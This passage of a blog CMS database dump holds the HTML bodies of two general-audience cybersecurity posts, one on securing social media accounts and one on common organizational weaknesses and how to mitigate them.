divulging sensitive information, like passwords or security codes.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Understanding these threats allows you to proactively guard against them.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Best Practices for Securing Social Media Accounts</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Use Strong, Unique Passwords</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">One of the simplest yet most effective ways to secure your accounts is to create strong, unique passwords. Avoid using easily guessable passwords like birthdates, names, or predictable phrases. Instead, follow these tips:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Use a combination of uppercase and lowercase letters, numbers, and symbols.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Create passwords that are at least 12 characters long.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Never reuse the same password across multiple accounts.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Consider using a password manager to generate and securely store unique passwords.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Enable Two-Factor Authentication (2FA)</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Two-factor authentication adds an additional layer of security to your accounts by requiring a second form of verification, such as a one-time code sent to your phone or email. Platforms like Facebook, Twitter, LinkedIn, and Instagram offer this feature. Once 2FA is activated, even if someone obtains your password, they can’t access your account without the secondary verification method.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. Regularly Update and Review Privacy Settings</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Social media platforms frequently update their privacy settings, and failing to review these changes can leave you vulnerable. Schedule time every few months to:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Adjust who can see your posts and personal information.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Limit access to your account to trusted individuals.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Disable unnecessary third-party app integrations.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. Avoid Suspicious Links and Messages</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Hackers often exploit curiosity and urgency to lead users into clicking malicious links. Always:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Be skeptical of unsolicited direct messages or emails claiming urgent requests.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Verify links by hovering over them to check their source before clicking.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Avoid downloading unknown attachments, even from seemingly trusted sources.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. Stay Updated on Platform Security Features</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Social media platforms continually roll out new security features to protect users. For example, Facebook and Instagram provide login activity reports, while LinkedIn offers an account lock feature when suspicious activity is detected. Stay informed about these updates and make full use of the security features available.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">6. Educate Employees and Team Members</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">For organizations, protecting social media accounts requires a team effort. Conduct regular training sessions to educate employees about:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Using strong passwords and enabling 2FA.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Recognizing phishing attempts and social engineering attacks.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Reporting any suspicious activity immediately.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Consider creating clear social media account policies and guidelines for employees to follow when managing corporate accounts.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Real-Life Example of Social Media Security Practices</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">One notable example of strong social media security is the case of a leading multinational brand (e.g., Starbucks). After becoming a target of phishing attacks, the company implemented mandatory 2FA for all employees handling social media accounts. Additionally, it provided extensive training on identifying and avoiding phishing scams. These measures prevented further breaches, and the company successfully safeguarded its reputation and customer trust.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Wrapping Up</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Securing your social media accounts isn’t optional; it’s a necessity for both personal and professional cybersecurity. By implementing best practices—such as strong passwords, two-factor authentication, regular privacy checks, and staying vigilant against suspicious links—you can significantly reduce risks. For organizations, fostering a culture of security awareness and training employees can further strengthen your digital defense.</p>', '', NULL, NULL, 1, 'draft', '2025-02-08 21:16:19', '2026-01-12 21:41:44', 'Information Security', 'Tips for Keeping Your Social Media Accounts Secure', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(47, 'Identifying and Mitigating Vulnerabilities in Organizational Cybersecurity', 'identifying-and-mitigating-vulnerabilities-in-organizational-cybersecurity', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Modern organizations heavily rely on technology to drive operations, foster communication, and spark innovation. However, with technological advancements, the threat landscape continues to grow, exposing businesses to a myriad of cyberattacks. Among these risks, the weakest points in an organization\'s cybersecurity infrastructure are often the most exploited. This detailed guide is designed for cybersecurity learners, aiming to dissect common vulnerabilities, their impact, and the strategies to mitigate them. We\'ll also explore real-world use cases to provide actionable insights.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What is the Weakest Link in Organizational Cybersecurity?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Every organization, big or small, has cybersecurity vulnerabilities. However, statistically, the weakest link often lies in <b><strong class=\"font-bold\">human error</strong></b>. Even with the best intentions, employees can inadvertently invite cyber threats through errors such as clicking malicious links, using weak passwords, or misconfiguring internal systems.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Real-World Example:</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A phishing email sent to an employee at a financial firm appeared to originate from the IT department. Clicking the link installed ransomware that encrypted critical company data, leading to a week-long shutdown and a loss of $1 million in revenue.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Common Weak Points in Cybersecurity Infrastructure</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">While vulnerabilities vary across industries and organizations, some common areas are frequently exploited:</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Human Error</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Cause</strong></b>: Clicking phishing links, poor password management, and falling victim to social engineering attacks.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Use Case</strong></b>: A global retailer\'s employee inadvertently sent sensitive customer data via unsecured email, violating GDPR regulations and resulting in hefty fines.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Outdated Software</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Cause</strong></b>: Failing to install the latest updates or relying on systems that have reached end-of-life status.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Use Case</strong></b>: The 2017 WannaCry attack targeted organizations using outdated Windows operating systems, affecting 200,000 computers across 150 countries.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. Insider Threats</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Cause</strong></b>: Negligent actions or malicious activities by employees with access to sensitive systems.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Use Case</strong></b>: A major investment firm experienced a breach when a disgruntled employee exploited admin credentials to leak sensitive information.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. Third-Party Risks</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Cause</strong></b>: Partners, vendors, or subcontractors with weak cybersecurity practices introducing vulnerabilities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Use Case</strong></b>: Target\'s 2013 breach, exposing credit card details of 40 million customers, occurred because attackers accessed networks through a third-party HVAC vendor.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. Lack of Cybersecurity Training</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Cause</strong></b>: Employees unaware of potential threats or how to handle them.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Use Case</strong></b>: An employee of a healthcare provider unknowingly opened a spear-phishing email, leading to the compromise of thousands of patient records and HIPAA violations.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Consequences of Cybersecurity Weaknesses</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The impact of these cybersecurity vulnerabilities can be extensive and damaging to an organization. Key consequences include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Data Breaches</strong></b>: Loss or theft of sensitive information, including financial data and IP.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Financial Loss</strong></b>: Ransomware attacks, business disruption, legal penalties, and the cost of remediation.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Reputational Harm</strong></b>: Eroding customer trust and loyalty, possibly leading to loss of business.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Regulatory Penalties</strong></b>: Non-compliance with laws like GDPR, CCPA, or HIPAA can carry significant fines.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Real-World Statistic:</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">According to IBM’s 2023 Cost of a Data Breach report, the average cost of a data breach globally is $4.45 million.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Practical Strategies to Address Cybersecurity Weaknesses</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Employee Training and Awareness</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Invest in regular employee training to recognize and respond to phishing attempts, ransomware threats, and other attacks.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Tactic</strong></b>:</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Conduct phishing simulation tests to evaluate your team\'s ability to detect malicious emails.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Implement Strong Password and Authentication Policies</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Use strong, unique passwords for all systems and implement multi-factor authentication (MFA).</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Tool Example</strong></b>:</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Platforms like LastPass or Okta can ensure password management and MFA integration.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. Regular Updates and Patching</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Ensure operating systems, software, and plugins are updated with the latest patches to close security gaps.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Use Case</strong></b>:</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">After suffering an exploit due to unpatched software, a manufacturing firm began enforcing automated patch management, significantly reducing vulnerabilities.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. Strengthen Endpoint Security</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Use endpoint protection tools, such as antivirus software, firewalls, and Endpoint Detection and Response (EDR) solutions.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Tool Example</strong></b>:</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">EDR platforms like CrowdStrike Falcon offer real-time threat detection and response across all connected devices.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. Assess Third-Party Vendor Risks</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Conduct cybersecurity audits of third-party vendors and enforce strict protocols for data access.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Tactic</strong></b>:</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Use third-party risk management tools like Prevalent and RiskRecon to assess vendors.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">6. Foster a Culture of Security</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Promote a culture where cybersecurity is seen as everyone’s responsibility, not just the IT department’s.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Overcoming Challenges in Cybersecurity Implementation</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Implementing effective cybersecurity strategies isn\'t without challenges. Here\'s how organizations can tackle common hurdles:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Cost Constraints</strong></b>:</li>\r\n</ol>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Approach solution providers offering scalable, cost-effective cybersecurity tools tailored to organizational size and budget.</li>\r\n</ul>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"2\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Cultural Resistance</strong></b>:</li>\r\n</ol>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Create awareness campaigns emphasizing the importance of cybersecurity and its role in protecting both employees and the business.</li>\r\n</ul>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"3\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Skill Gaps</strong></b>:</li>\r\n</ol>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Partner with Managed Security Service Providers (MSSPs) to access expertise and fill resource gaps.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Best Practices to Strengthen Cybersecurity Posture</h2>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Zero Trust Architecture</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Require all users and devices to verify credentials before accessing systems.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Comprehensive Disaster Recovery Plan</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Ensure rapid recovery after an incident, minimizing downtime.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\"><b><strong class=\"font-bold\">Conduct Penetration Testing</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\">Periodically simulate attacks to identify and rectify vulnerabilities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"7\"><b><strong class=\"font-bold\">Continuous Monitoring</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"8\">Use tools like SIEM (e.g., Splunk) to detect, analyze, and respond to threats in real time.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Proactive Steps:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Regularly update incident response plans.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 